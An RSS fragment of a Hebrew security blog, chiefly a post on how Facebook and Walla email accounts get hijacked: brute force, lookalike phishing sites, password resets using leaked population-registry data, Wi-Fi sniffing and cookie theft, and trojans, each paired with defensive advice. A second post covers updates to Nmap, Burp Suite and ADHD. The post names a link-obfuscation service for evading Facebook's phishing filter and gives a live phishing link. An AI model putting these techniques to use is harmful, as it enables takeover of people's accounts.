<p dir="ltr" style="text-align: right;">&quot;A horse, a horse, my password for a horse!&quot;</p>
<p>שכתוב שייקספיר</p></blockquote>
<p>הרשת מלאה בתוכנות פריצה לפייסבוק. הבטחות ל- 100% פריצה ופיצוח הקוד או הסיסמה לפרופיל מושמעות בכל פורום, למזלנו ישנם תוכנות בודדות (מאוד!) שבאמת עובדות. מעבר לזה, רובם מכילות וירוסים כדי להפיל &quot;פורצים&quot; חובבניים. רוב התוכנות, גם במידה והן עובדות, מוצאות את דרכם לג'אנק האינטרנט מהר מאוד, הפייסבוק עולה על חור האבטחה ומנטרל אותו תוך מספר ימים מזמן הגילוי שלו.</p>
<blockquote><p>במדריך הבא יסביר <strong>עמית כהן</strong> בצורה פשוטה כיצד משיגים גישה לחשבונות אישיים באתרי האינטרנט. לצורך דוגמה נשתמש ברשת החברתית הגדולה בעולם – פייסבוק.</p></blockquote>
<p>ישנן מספר שיטות לקבל גישה לחשבון משתמש:</p>
<h2>1. Brute force</h2>
<p>הדרך הישנה והלא מתוחכמת – ניחוש הסיסמה ע&quot;י נסיונות חוזרים ונשנים. איך זה מתבצע?</p>
<p>את התוכנה לסריקת הסיסמאות מזינים ע&quot;י:</p>
<ul>
<li>כתובת התקפה, כתובת IP של השרת המארח או של הדומיין של הדף הכניסה שדרכו מנסים להיכנס.</li>
<li>רשימת פרוקסי, שזה מין דרך לפצל את חיבור האינטרנט שלכם להמון המון חיבורים קטנים בעלי IP שונה. כך גם קשה לחסום את אותם הפורצים וגם הם יכולים לנסות המון סיסמאות במקביל.</li>
<li>רשימת צירופי סיסמאות, רשימה בעלת אלפי ומאות אלפי סוגי סיסמאות וצירופים שונים. החל מרשימת סיסמאות פופולאריות (כן, הסיסמה 12345 והסיסמה 654321, יש באמת אנשים שמשתמשים בזה) וכלה בקומבינציות שונות של סיסמאות, שילובים של שמות עם מספרים, שמות ותאריכי לידה, כל הקומבינציות השונות לסיסמת 6 ספרות וכו'. אפשר לסרוק הכל ולבנות רשימת סיסמאות ענקית שמתוך מאות אלפי הסיסמאות סביר להניח שהמשתמש הפשוט בחר באחת מהם.</li>
</ul>
<p>וזהו בעצם. נותנים לזה לרוץ כמה שעות טובות (לפעמים גם כמה ימים) והתוכנה מנסה להיכנס עם כל אחת מהסיסמאות לפרופיל הפייסבוק.</p>
<div id="attachment_894" style="width: 732px" class="wp-caption aligncenter"><a href="http://www.saltedhash.co.il/wp-content/uploads/2013/10/hydra.png"><img aria-describedby="caption-attachment-894" loading="lazy" class="size-full wp-image-894" title="Hydra" alt="תוכנה לביצוע brute force" src="http://www.saltedhash.co.il/wp-content/uploads/2013/10/hydra.png" width="722" height="434" srcset="https://www.saltedhash.co.il/wp-content/uploads/2013/10/hydra.png 722w, https://www.saltedhash.co.il/wp-content/uploads/2013/10/hydra-300x180.png 300w" sizes="(max-width: 722px) 100vw, 722px" /></a><p id="caption-attachment-894" class="wp-caption-text">תוכנת brute force בפעולה (Hydra)</p></div>
<p>לרעתם של הפורצים / האקרים ולטובתינו חשוב לציין שזה רק נשמע לכאורה פשוט. סריקת סיסמאות לפייסבוק זו אחת הדרכים הכי מיושנות ולא מוצלחות לפרוץ לפייסבוק. רשימות הפרוקסי מתעייפות לעיתים קרובות ומתנתקות באמצע, רשימת הסיסמאות מכילה מאות אלפי קומבינציות וגם הן לא בטוח נכונות. התהליך ארוך ומייגע ופייסבוק חוסמת את כל הכתובות שמנסות לסרוק (להיכנס ע&quot;י) סיסמאות במוקדם או במאוחר. הרבה יותר פשוט לדעת את הסיסמה ע&quot;י שיחה עם הקורבן מאשר לשבת ולסרוק בלי סוף&#8230;</p>
<p>הדרך הכי טובה להתגונן מפני ההתקפה הזו היא פשוטה יחסית, מכיוון שהפריצה הזו פרימיטיבית ועובדת רק בדרך כלל על המשתמשים &quot;הפשוטים&quot; שלא יודעים מה חשיבותה של סיסמה וחושבים &quot;מי כבר ינסה להיכנס לי לחשבון&quot;. הדרך לסגור את ההתקפה הזו היא פשוט להזין סיסמה שאין סיכוי (יש סיכוי אבל הוא קרוב לסיכוי לזכייה בלוטו) שרשימת הסיסמאות מכילה אותו. סיסמה &quot;חזקה&quot; טובה לא ניתנת לפריצה ע&quot;י סריקת סיסמאות, מה בונה סיסמה חזקה?</p>
<ul>
<li>אותיות גדולות וקטנות</li>
<li>ספרות שונות</li>
<li>סימנים שונים</li>
<li>שפה שונה</li>
<li>סדר רנדומלי</li>
</ul>
<p>ככל שתשלבו יותר מהפרמטרים הללו כך הסיסמה תהייה יותר קשה לפיצוח (ברמה של בלתי אפשרית). דוגמא לסיסמה חזקה מאוד ולא מוגזמת היא &quot;Udont4ME!0&quot;.</p>
<p>מתוסכלים מדרישות מוגזמות לסיבוכיות הסיסמה והדרישה להזדהות בכל מקום? אתם לא היחידים שנאלצים למצוא <a title="מחשבות על אבטחה מנקודת מבטו של המשתמש הפשוט" href="http://www.saltedhash.co.il/blog/user-thoughts-about-security/" target="_blank">שיטה לזכור סיסמאות</a>.</p>
<p>ובכן, רוב הפריצות לפרופילים בפייסבוק הינן בגלל טעות אנוש. הפופולאריים ביניהן – פריצה דרך המייל או ע&quot;י פישינג.</p>
<h2>2. Phishing</h2>
<p>אחת הדרכים הכי פופולאריות לפריצה לפייסבוק היא ע&quot;י פישינג. מהו פישינג ואיך עובדים איתו (ועלינו)?</p>
<p>מקור השם <strong>פישינג</strong> (<strong>Phishing</strong>) – שיבוש של המילה דייג באנגלית, או בעברית תקנית <strong>דיוג</strong>. השם מרמז על צורת דייג, רק שכאן לא מנסים לתפוס דגים אלה &quot;פראיירים&quot; שיאמינו לאתר המזויף שהוא באמת פייסבוק. שיבוש השם בלועזית נוצר מכיוון שגם באתר המזוייף כמו בדייג מדמים משהו אמיתי ומקורי, יוצרים פיתיון שמאוד דומה לדבר האמיתי, אך בעצם זו רק הדמיה.</p>
<p>הפישינג הוא בעצם <strong>התחזות אתר אינטרנט זדוני</strong> לאתר אינטרנט אחר. ההתחזות לרוב מאוד מאוד דומה למקור, הכל תלוי באיכויותו וסבלנותו של יוצר דף הפישינג. יוצר הדף לוקח את מבנה הדף המקורי שאותו הוא רוצה &quot;לשכפל&quot; ומעתיק את כל המידע, המבנה, התמונות והגרפיקה מהאתר המקורי לאתר הדמה שהוא בנה. פישינג טוב נמדד בהתחזות לאתר המקורי בכמה שיותר היבטים ובאופן מקיף ככל הניתן:</p>
<ul>
<li>בניית אתר המדמה את האמיתי, שכוללת הפנייה פנימית של לינקים ומעבר לדף באתר המקורי לאחר הזנת הפרטים כדי לשפר את האמינות.</li>
<li>מעבר לכך, לאחר הזנת הפרטים שלכם לא יופיע שלט &quot;אה אה אה עבדתי עליכם, אני פורץ!&quot;, אלא אתם תועברו לאתר המקורי בדיוק לדף הספציפי שהייתם אמורים להגיע. הדף המזויף שימש באמת להזנת הפרטים, לאימות עם השרת של פייסבוק ולהעברת הגולש לדף הרלוונטי, רק שבדרך, לפני שליחת הפרטים שהבאתם לאתר המקורי לאימות, הפורץ נותן פקודה לרשום אותם אצלו בצד.</li>
<li>עיצב האתר שיהיה זהה ככל הניתן ונאמן למקור. זהו החלק הפשוט יחסית. אין צורך ליצור שום דבר חדש, פשוט לקחת ולהעתיק את כל המלל, מבנה והגרפיקה מהאתר המקורי ולהעתיק אותם באופן זהה לאתר הדמה של הפורץ.</li>
<li>היבט אחרון הוא קניית דומיין הדומה ויזואלית ככל הניתן למקור כדי שהקורבן לא יבדיל. לדוגמא – facehook.com ,face.book.com, או faceb00k.com. שימו לב ששום דומיין כאן הוא לא המקורי, הם כתובים בצורה מאוד זהה למקור מבחינת העין שקוראת את המילה. הדוגמאות שהבאתי מאוד אטראקטיביות, מכיוון שהן מאוד דומות לדומיין המקורי. לרוב, הפורצים לא ישקיעו כל כך בזיוף הכתובת ולא יקנו כתובת תקנית, מכיוון שכתובת תקנית צריכה להיות רשומה על שם של מישהו. ומכיוון שזה דבר שכרוך בתשלום (מסנן אוטומטית ילדים בני 16 שרוצים לפרוץ לשם ההנאה) לרוב הכתובות יהיו על דומיינים חינמיים או סאב דומיין.</li>
</ul>
<p>שום פורץ, טוב ככל שיהיה, <strong>לא יכול לזייף דומיין בדיוק</strong>. פורץ טוב יכול לתת כתובת דומה למקור, כמו הדוגמאות שהבאתי, אבל אין אפשרות לזייף כתובת זהה בדיוק ללא התערבות בהגדרות מחשב או התעבורה של הקורבן, או פריצה לשרתי DNS המאחסנים את הדומיין שאליו מכוונים (<strong>DNS spoofing</strong>).</p>
<div id="attachment_898" style="width: 853px" class="wp-caption aligncenter"><a href="http://www.saltedhash.co.il/wp-content/uploads/2013/10/SET.png"><img aria-describedby="caption-attachment-898" loading="lazy" class="size-full wp-image-898" title="SET" alt="כלי ליצירת אתר כפיל - SET" src="http://www.saltedhash.co.il/wp-content/uploads/2013/10/SET.png" width="843" height="434" srcset="https://www.saltedhash.co.il/wp-content/uploads/2013/10/SET.png 843w, https://www.saltedhash.co.il/wp-content/uploads/2013/10/SET-300x154.png 300w" sizes="(max-width: 843px) 100vw, 843px" /></a><p id="caption-attachment-898" class="wp-caption-text">אחד הכלים השימושיים ליצירת אתר כפיל – SET</p></div>
<p>האתר המזויף יכול לבוא גם בצורה של פריצה למשחקים בפייסבוק, או אתר שמביא לכם גרסאות משחק &quot;מעודכנת יותר&quot;.</p>
<p>איך נזהרים? מלבד להסיט מבט לדומיין האתר, אתם יכולים גם לשים לב לשינויים מינוריים בעיצוב או במבנה האתר. כל שינוי קטן שאתם לא מכירים יכול להוות נורת אזהרה, אל תהססו לבדוק שוב את הדומיין או לרשום אותו באופן ידני. אם אתם רוצים למנוע מצב של הגעה לדפים מזויפים ולהקדים תרופה למכה אתם פשוט צריכים <strong>להיכנס לכתובת בעצמכם</strong> ולא ללחוץ על שום קישור שיוביל אתכם לכתובת, אפילו אם מציעים לכם &quot;לחיצה עליי תביא לכם את סוס הפוני הכחלחל הקסום בפארם-וויל&quot;. אתם רוצים להיכנס לאתר? או דרך גוגל או לרשום אותו ידנית בעצמכם.</p>
<p>בהזדמנות זו ארצה להזכיר שבזמן האחרון לפייסבוק יש מערכת שלא תאפשר לפורצים לשלוח לינק לדף פישינג בצ'אט. יותר מזאת, היא מעדכנת את הדפדפן גוגל כרום בדף הזדוני והוא מוגדר כמסוכן, אבל כמו שאתם יודעים, רוב ההאקרים מצאו דרך מקורית מאוד לעקוף את זה. ע&quot;י קידוד והסתרה של דף הפישינג, מנגנון האבטחה של פייסבוק לא מזהה את הדף הזדוני. בין האתרים שמקודדים ומצפינים את הכתובת לאתרכם: <a href="http://link-safe.net" target="_blank">http://link-safe.net</a>.</p>
<p>הנה דוגמא לדף פישינג שפייסבוק לא יחסמו, אלה אם כן זה ידווח בצורה ידנית וגם אז רק הרבה זמן יטופל אם בכלל (<strong>שימו לב לא להכניס שם פרטים!</strong>):</p>
<p>http://link-safe.net/out/0e70a473-0a4a/269671</p>
<p>שימו לב ששינוי כתובת URL על ידי קיצור לא מחייב קידוד, אבל הקידוד לא מאפשר למנועים של פייסבוק סריקה אוטומטית של האתר והסרתו במקרה הצורך.</p>
<h2>3. פריצה לאימייל</h2>
<p>אחת הדרכים לפרוץ לפייסבוק שלכם (ולכל עולמכם הווירטואלי) זה פריצה לאימייל. מכיוון שיש שוני ניכר בין תיבות האימייל השונות, אנחנו נתמקד הפעם באימייל של וואלה. המייל של וואלה מאוד פופולארי בארץ, אולי בגלל פשטותו ואולי בגלל העברית הצחה שבו.</p>
<p>המייל של וואלה יספק לכם את הסיסמה לדואר של משתמש ללא כל תוכנת פריצה מיוחדת, ידע גדול בפריצות או יצירת דף פישינג. הדבר היחידי שהוא דורש הוא מספר פרטים מזהים כדי לראות שאתם בעלי החשבון ולחיצה על &quot;שחכת את הסיסמה?&quot;</p>
<p>אילו פרטים מזהים הוא דורש ואיך אני מסתיר אותם מפני פורצים?</p>
<ol>
<li>שם משתמש לדואר;</li>
<li>תאריך לידה;</li>
<li>פרט זיהוי – יכול להיות אחד מהבאים: שם אמא, אבא, חבר הכי טוב, שם סרט אהוב, פתגם אהוב, ספר אהוב, דמות אהובה מסרט וכו'.</li>
</ol>
<p>כמו שאתם רואים שניים זה ממש קל להשיג, את השלישי זה טיפה דורש יותר תחכום.</p>
<ol>
<li>את שם המשתמש לדואר שלכם אפשר לאתר בקלות ע&quot;י ידיעת כתובת הדואר (ב- Gmail זה לא חייב להיות כך). את שם המשתמש אפשר לאתר בקלות: שם משתמש כאן – example@walla.co.il, יהיה כאמור example.</li>
<li>את תאריך הלידה שלכם אפשר למצוא ע&quot;י תוכנה שמופצת ברשת בשם &quot;רישומון&quot; – תוכנה שכוללת את כל מרשם האוכלוסין של מדינת ישראל, שם תמצאו ת&quot;ז של אנשים, תאריכי לידה ועוד פרטים מועילים. כמובן שאפשרי להשיג את המידע ע&quot;י שיחה טלפון אליכם. או קחו לדוגמא מצב שנגש אליכם בחור/ה מהמין השני שטוענת שמתעניינת באסטרולוגיה, או שאומרת לכם שהיא בדיוק גם מזל שור ושואלת לגבי מה התאריך המדויק שלכם &#8211; אני אספר לכם משהו? אתם תתנו את התאריך ובלי מחשבה אפילו. הנורמה החברתית אומרת שזה פרט שולי שאין בעיה לספר אותו ואתם תספרו ואפילו תשמחו לספר כדי שידעו מתי יום ההולדת שלכם (במיוחד אם זה בחור/ה אטרקטיבית).</li>
<li>פרט הזיהוי הוא עקב אכילס פה – מצד אחד זה אמור להיות פרט שאתם תמיד תזכרו, כדי שתוכלו להחזיר לעצמכם את הסיסמה, מצד שני הפרט שאתם תמיד תזכרו צריך להיות כזה שאם שואלים אתכם עליו ישר תדלק לכם נורה אדומה. אם שמתם פרט זיהוי שהוא שם אבא/אמא או דברים שכן הגיוני שישאלו אתכם, לדוגמא &quot;יוו אני חושב שאני מכיר אותך, לאמא שלך קוראים שרה? &#8211; לא, קוראים לה בכלל לאה.&quot; הופ, חשפתם את מנגנון האבטחה האחרון (והפשוט יש לומר) שלכם. לכן, כדאי לבחור שאלת זיהוי לא פשוטה, שאין שום סיבה הגיונית שבעולם שתגידו אותה ללא תמרור אזהרה ברור שיהיה לכם מול הפנים. ככל שתהיו חשאיים יותר, כך הפורץ יהיה צריך להיות מחוכם יותר. כך שאם כבר יפרצו לחשבון שלכם, לפחות זה יהיה אחרי מאבק מתיש. חשבו על פרט זיהוי שלא תשכחו מצד אחד, אבל שלא תספרו לאחרים מצב שני.</li>
</ol>
<p>קחו בחשבון שאם המין השני אטרקטיבי מספיק, תוך שיחה קצרה הוא יכול לחשוף את כל אחד מהפרטים הללו בלי מאמץ מיותר. חשדו תמיד באנשים שאינכם מכירים ודברים &quot;טובים מידי&quot; בכדי שיהיו אמיתיים. אם זה טוב מידי כנראה שזה לא אמיתי, עם כל האכזבה שבדבר. אל תהיו תמימים ואל תחשפו את המייל שלכם בפייסבוק בכלל, אין שום דבר מועיל בלנדב את המידע הזה. ופורץ טוב רק צריך לראות את הפרצה בכדי להיכנס, אז אל תתנו לו אפילו את הפתח הצר ביותר.</p>
<p>מנגנון הגנה כדאי למייל שלכם הוא מייל חלופי, כך שאם תשכחו את הסיסמה היא פשוט תשלח למייל החלופי שלכם. כדאי שיהיה לכם אחד נוסף אישי שאיתו לא נרשמים לאתרים.</p>
<p><em>הערת העורך: רגע, ומה אם בשיטה זהה השיגו את הגישה למייל האישי שאיתו קיבלו גישה למייל של וואלה שדרכו אני נכנס לפייסבוק? התבלבלתי&#8230; ס_ם</em></p>
<p>ולכן אני ממליץ לכם לאבטח את חשבון האימייל שלכם ע&quot;י הפאלפון, שבמקרה שתישכח הסיסמא תוכלו לשחזרה ע&quot;י SMS .</p>
<div id="attachment_899" style="width: 977px" class="wp-caption aligncenter"><a href="http://www.saltedhash.co.il/wp-content/uploads/2013/10/mirsham.png"><img aria-describedby="caption-attachment-899" loading="lazy" class="size-full wp-image-899" alt="מרשם האוכלוסין של מדינת ישראל" src="http://www.saltedhash.co.il/wp-content/uploads/2013/10/mirsham.png" width="967" height="606" srcset="https://www.saltedhash.co.il/wp-content/uploads/2013/10/mirsham.png 967w, https://www.saltedhash.co.il/wp-content/uploads/2013/10/mirsham-300x188.png 300w" sizes="(max-width: 967px) 100vw, 967px" /></a><p id="caption-attachment-899" class="wp-caption-text">בתמונה מרשם האוכלוסין של מדינת ישראל ובו מידע יקר ערך על רוב הישראלים<br />מקור: <a href="http://up353.siz.co.il/up1/fynqkm5j5t2y.png" target="_blank">http://up353.siz.co.il/up1/fynqkm5j5t2y.png</a></p></div>
<h2>4. רשתות ציבוריות</h2>
<p>בהמון מקומות ציבוריים נותנים לנו, כחלק מהשירות, נקודת גישה אלחוטית לאינטרנט. ניתן למצוא את הנקודות הללו בכל בית קפה שמכבד את עצמו, חנויות מחשבים וכו'. החיבור מתבצע ע&quot;י קישוריות לנקודת הגישה של המקום ללא צורך בסיסמה או נתונים מיוחדים. מלבד זה שהחיבור לרוב מאוד מאוד איטי הוא גם יכול להוות <strong>תדר האזנה</strong> למה שאתם עושים באינטרנט באותו זמן. <strong>פרופיל פייסבוק פרוץ</strong> הוא אולי אחד הצרות הקטנות ביותר שלכם, אם תחליטו גם להיכנס דרך רשתות אלו לחשבון הבנק שלכם לדוגמא.</p>
<p>נקודות WiFi ציבורית אינן מאובטחות וכל אחד יכול להתחבר אליהן. יש לזה יתרונות מבחינת נוחות, אך יתרון זה יכול להוות גם פרצת אבטחה ברורה. במידה ואתם גולשים למקומות הדורשים סיסמת משתמש, להבדיל מהתחברות לפייסבוק במחשבים ציבוריים, כאן ישנה הרגשה שאתם כן מוגנים. אתם יושבים על במחשב שלכם, שאותו אבטחתם באנטי וירוס והפיירוול החזקים ביותר והסיסמאות שאתם מזינים (במידה והן נשמרות, הן נשמרות על המחשב הפרטי שלכם). אך שכחתם פרט אחד, לא משנה כמה המבצר שלכם יהיה בעל חומות גבוהות, אם לא תאבטחו את ספינות הציוד שנכנסת ויוצאת ממנו אתם עדיין תחוו אבדות. כלומר, לא משנה כמה המחשב שלכם מוגן, אם המידע נשלח ליעדו בדרך שאינה מאובטחת, פורצים יכולים ליירט אותו או להאזין לו בדרך לייעדו, וכך לדעת את פרטי הכניסה שלכם. כאן לא מדובר על אתר המתחזה לפייסבוק שיבצע יירוט סיסמה בדרך ליעדה המקורי, אלא על &quot;פיראטים&quot; שישדדו את המידע שלכם בדרך ליעדו רק כי אין אבטחה לרשת.</p>
<p>פורץ יכול לשבת בבית קפה תמים, להפעיל תוכנת פריצה והאזנה לרשת, לחכות ולקלוט אתר מעניין שנכנסים אליו. על הצג לרוב תעבורת הרשת של הקורבן ולאחר מכן, במידה שאתר שדורש סיסמה, שם המשתמש והסיסמה של הקורבן. הפורץ רק צריך לצפות ולחכות למתי שיש זיהוי של אתר מעניין או לזהות שם משתמש (לרוב מייל) ולאחר מכן השורה הבאה תהיה לרוב הסיסמה.</p>
<div id="attachment_900" style="width: 923px" class="wp-caption aligncenter"><a href="http://www.saltedhash.co.il/wp-content/uploads/2013/10/wireshark-ftp-sniff.png"><img aria-describedby="caption-attachment-900" loading="lazy" class="size-full wp-image-900" title="Wireshark" alt="תוכנה להאזנת תעבורת הרשת" src="http://www.saltedhash.co.il/wp-content/uploads/2013/10/wireshark-ftp-sniff.png" width="913" height="635" srcset="https://www.saltedhash.co.il/wp-content/uploads/2013/10/wireshark-ftp-sniff.png 913w, https://www.saltedhash.co.il/wp-content/uploads/2013/10/wireshark-ftp-sniff-300x208.png 300w" sizes="(max-width: 913px) 100vw, 913px" /></a><p id="caption-attachment-900" class="wp-caption-text">תוכנה ידועה בשם Wireshark להאזנה לתעבורת הרשת</p></div>
<p>היום מצויות תוכנות פשוטות כגניבת ה- cookies (בהם נשמרים פרטי הזדהות). ביניהן תוכנות כדוגמת FaceNiff או Firesheep.</p>
<p>אז מה עושים? לא לגלוש משום מקום?! כמו בכל דבר בחיים גם פה יש רמת סיכון מסויימת. אם אתם רוצים שלא ישדדו אתכם ברחוב אתם יכולים להשאר בבית, אבל כמובן שזה לא פיתרון. הרשתות הציבוריות הפתוחות מיועדות לרווחת הקוחות ולהנאתם. אין בעיה לגלוש באתרים לשם ההנאה או אתרי מידע כל עוד שהם אינם דורשים מכם שם משתמש וסיסמה. אתם יכולים לדמיין את המצב הבא – נניח שהרשת בבית הקפה מאובטחת אבל יש מאחוריכם אדם שמסתכל מה אתם עושים במחשב, אתם הרי לא תכנסו לאתרים בעלי סיסמה כדי שהוא לא יראה מה אתם מקלידים&#8230; כך אותו הדבר גם ברשת WiFi פתוחה. אפשר להיכנס לאן שרוצים ולרוב אפילו לא יקרה כלום, אבל מספיק פעם אחת &quot;שיהיה מישהו מאחורה&quot;, שבמקרה שלנו הוא לא חייב להסתכל פיזית על האצבעות שלכם, אלא להאזין לרשת ולראות על הצג שלו מה אתם מקלידים וזה יהיה פעם אחת יותר מידי. בסך הכל אין הרבה אנשים שיושבים ומאזינים לכם ברשתות ציבוריות אך מספיק שיהיה אדם אחד שתתקלו בו והתוצאות יכולות להיות מרות מאוד. במקרה הטוב יפרצו לכם לפייסבוק, במקרה הרע אתם תאבדו מידע עיסקי יקר מפז ואת חשבון הבנק שלכם.</p>
<p><em>הערת העורך: אם כבר גולשים לאתר הדורש פרטי הזדהות שאכפת לנו מהם, אז לפחות רק אם האתר הזה עובד ב- HTTPS. שגם את זה אפשר לעקוף, דא&quot;ג, כמו ע&quot;י <strong>SSL null-prefix attack</strong> (יש וידאו בסוף הפוסט על הנושא הזה), או קניית דומיין (כפי שנכתב בחלק על פישינג קודם) ויצירת תעודת SSL מתאימה, כך שיראה לגיטמי.</em></p>
<h2>5. תוכנות ריגול</h2>
<p>דרך נוספת היא השתלת <a title="האנטומיה של בוט, פרק 1: איך זה עובד" href="http://www.saltedhash.co.il/blog/what-is-botnet/" target="_blank">סוס טרויאני</a> במחשבו של המשתמש (ופלאפון בימינו הוא גם מחשב לכל דבר), אשר יגנוב סיסמאות שמורות בדפדפן או יתקין קילוגר שישדר כל מה שאתם מקלידים וישלח לשרת של התוקף.</p>
<h2>לסיכום</h2>
<p>מהעורך: כתבה זו נותנת מבט מגובה עשרת אלפים רגל על נושא פריצת החשבונות וגניבת הזהות. <a title="פרטיות באינטרנט" href="http://www.saltedhash.co.il/privacy/" target="_blank">פרטיות באינטרנט</a> הוא נושא מאוד מורכב. האם ישנן חלופות טובות לאופן ההזדהות, בו אנו נדרשים לשלוח פרטי הזדהות בצורה &quot;גלויה&quot;? אולי <a title="הזדהות אקטיבית" href="http://www.saltedhash.co.il/blog/active-authentication/" target="_blank">הזדהות אקטיבית</a> מתישהו תיתן פתרון ממשי. בינתיים – תהיו ערניים ואל תמסרו פרטים אישיים למי שאתם לא מכירים. וזכרו – אם אתר כלשהו (במיוחד הבנק) ידרוש את הסיסמה שלכם, מיד תדליקו נורה אדומה.</p>
<p>לא דיברנו כאן על האפשרות לגניבת החשבות דרך חולשה באתר עצמו, שזו כמובן גם אחת האפשרויות. לא נרחיב כאן, אך ישנם מספר פוסטים מעניינים מאת ניר גולדשלגר, המתארים את אופן שבו הוא השיג גישה לחשבונות פייסבוק בצורה באמצעות חולשות במערכת (הכול דווח לפייסבוק ונסגר, כמובן):</p>
<p><a href="http://www.breaksec.com/?tag=facebook" target="_blank">http://www.breaksec.com/?tag=facebook</a></p>
<h2>פינת השכלה כללית</h2>
<p>בפרק 4 הזכרתי מתקפה מסוג SSL null-prefix. זו שיטה מאוד מעניינת שהוצגה ע&quot;י מוקסי מארלנספייק בדפקון 17. מומלץ בחום:</p>
<p><iframe loading="lazy" width="620" height="349" src="http://www.youtube.com/embed/ibF36Yyeehw?feature=oembed" frameborder="0" allowfullscreen></iframe></p><p>The post <a href="https://www.saltedhash.co.il/blog/stealing-accounts-for-dummies/">גניבת חשבונות for dummies</a> first appeared on <a href="https://www.saltedhash.co.il">גיבוב ממולח</a>.</p>]]></content:encoded>
					
					<wfw:commentRss>https://www.saltedhash.co.il/blog/stealing-accounts-for-dummies/feed/</wfw:commentRss>
			<slash:comments>5</slash:comments>
		
		
			</item>
		<item>
		<title>מבזק עדכונים 25-09-2013: ADHD, Nmap, Burp Suite</title>
		<link>https://www.saltedhash.co.il/blog/updates-2013-09-25-adhd-nmap-burp/</link>
					<comments>https://www.saltedhash.co.il/blog/updates-2013-09-25-adhd-nmap-burp/#respond</comments>
		
		<dc:creator><![CDATA[לאוניד יזרסקי]]></dc:creator>
		<pubDate>Thu, 26 Sep 2013 12:35:19 +0000</pubDate>
				<category><![CDATA[חדשות]]></category>
		<category><![CDATA[ADHD]]></category>
		<category><![CDATA[Burp Suite]]></category>
		<category><![CDATA[Nmap]]></category>
		<category><![CDATA[Plug-n-Hack]]></category>
		<category><![CDATA[הגנה אקטיבית]]></category>
		<guid isPermaLink="false">http://www.saltedhash.co.il/?p=861</guid>

					<description><![CDATA[<p>ADHD &#8211; הפצת לינוקס להגנה אקטיבית לא מדובר על הפרעת קשב וריכוז, אלא על Active Defense Harbinger Distribution. זה לא ממש &#34;חדשות&#34;, [&#8230;]</p>
<p>The post <a href="https://www.saltedhash.co.il/blog/updates-2013-09-25-adhd-nmap-burp/">מבזק עדכונים 25-09-2013: ADHD, Nmap, Burp Suite</a> first appeared on <a href="https://www.saltedhash.co.il">גיבוב ממולח</a>.</p>]]></description>
										<content:encoded><![CDATA[<h2>ADHD &#8211; הפצת לינוקס להגנה אקטיבית</h2>
<p>לא מדובר על הפרעת קשב וריכוז, אלא על Active Defense Harbinger Distribution. זה לא ממש &quot;חדשות&quot;, אבל לא כולם שמעו כבר על הפצת לינוקס זו. מטרתה היא לאגד כלים שונים להגנה אקטיבית. לדוגמה, יכולת לסבך כלי סריקות ע&quot;י יצירת עמודים אקראיים על קישורים מחזוריים (Spidertrap); למידה על התוקף באמצעות הזרקת applet שסורק רשתות WiFi בקרבת מחשבו של התוקף (Honeybadger); סינון אוטומטי של כתובות IP המתחברות לפורט &quot;מלכודת&quot; (Bear Trap) ועוד. הפרויקט מומן ע&quot;י DARPA.</p>
<p style="text-align: center;"><a href="http://www.saltedhash.co.il/wp-content/uploads/2013/09/ADHD.png"><img loading="lazy" class="aligncenter size-full wp-image-868" alt="הגנה אקטיבית עם ADHD" src="http://www.saltedhash.co.il/wp-content/uploads/2013/09/ADHD.png" width="1024" height="689" srcset="https://www.saltedhash.co.il/wp-content/uploads/2013/09/ADHD.png 1024w, https://www.saltedhash.co.il/wp-content/uploads/2013/09/ADHD-300x201.png 300w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p>
<p><a href="http://sourceforge.net/projects/adhd/" target="_blank">האתר הרשמי והורדה</a>.</p>
<p>ראיון עם היוצרים של ADHD בפודקאסט PaulDotCom:</p>
<p><iframe loading="lazy" width="620" height="349" src="http://www.youtube.com/embed/KcCjMbqP7sA?feature=oembed" frameborder="0" allowfullscreen></iframe></p>
<h2>Nmap &#8211; גרסה 6.40</h2>
<p>עדכון משמעותי של כלי סריקת הפורטים, הכולל: 14 סקריפטים חדשים, מאות חתימות לגילוי מערכות הפעלה, יכולת הרצת סקריפטים מובנית בכלי Ncat ועוד.</p>
<p>קצת קשה לקרוא ל- Nmap רק &quot;כלי לסריקת פורטים&quot;. מאז ש- Nmap הוסיף תמיכה בסקריפטים (NSE), הוא הפך להיות שחקן משמעותי בזירת כלים לסריקת פגיעויות. לדוגמה, תראו אילו סקריפטים נוספו בגרסה החדשה:</p>
<ul>
<li>http-fileupload-exploiter, המממש טכניקות שונות כדי לרמות את מגבלות העלאת הקבצים באפליקציות ווב;</li>
<li>http-phpmyadmin-dir-traversal, המנצל חולשה ב- phpMyAdmin גרסה 2.6.4pl1 כדי להוריד קבצים פנימיים מהשרת;</li>
<li>http-stored-xss, המחפש חולשת Stored XSS באתר.</li>
</ul>
<p><a href="http://seclists.org/nmap-announce/2013/1" target="_blank">רשימה מלאה של עדכונים והורדה</a>.</p>
<h2>Burp Suite &#8211; גרסה 1.5.15</h2>
<p>עדכון לאחד הכלים הנפוצים מסוג HTTP proxy, המכיל גם פיצ'רים רבים לביצוע vulnerability assessment.</p>
<p>בגרסה החדשה נוספו יכולות מעניינות, כגון:</p>
<ul>
<li>אפשרות להעביר חיבורי SSL לשרת יעד ללא ביצוע intercept (היכולת שימושית עבור אפליקציות שלא עובדות טוב עם תעודת SSL של burp);</li>
<li>חוקי interception חדשים;</li>
<li>תמיכה בתוסף <a href="https://blog.mozilla.org/security/2013/08/22/plug-n-hack/" target="_blank">Plug-n-Hack</a> שיאפשר אינטגרציה נוחה יותר בין כלי proxy לבין הדפדפן.</li>
</ul>
<p>העדכונים בינתיים רק עבור גרסת professional.</p>
<div id="attachment_866" style="width: 927px" class="wp-caption aligncenter"><a href="http://www.saltedhash.co.il/wp-content/uploads/2013/09/burppnh.jpg"><img aria-describedby="caption-attachment-866" loading="lazy" class="size-full wp-image-866  " title="התממשקות של Burp Suite לתוסף Plug-n-Hack" alt="התממשקות של Burp Suite לתוסף Plug-n-Hack" src="http://www.saltedhash.co.il/wp-content/uploads/2013/09/burppnh.jpg" width="917" height="413" srcset="https://www.saltedhash.co.il/wp-content/uploads/2013/09/burppnh.jpg 917w, https://www.saltedhash.co.il/wp-content/uploads/2013/09/burppnh-300x135.jpg 300w" sizes="(max-width: 917px) 100vw, 917px" /></a><p id="caption-attachment-866" class="wp-caption-text">נלקח מהאתר הרשמי של Burp Suite</p></div>
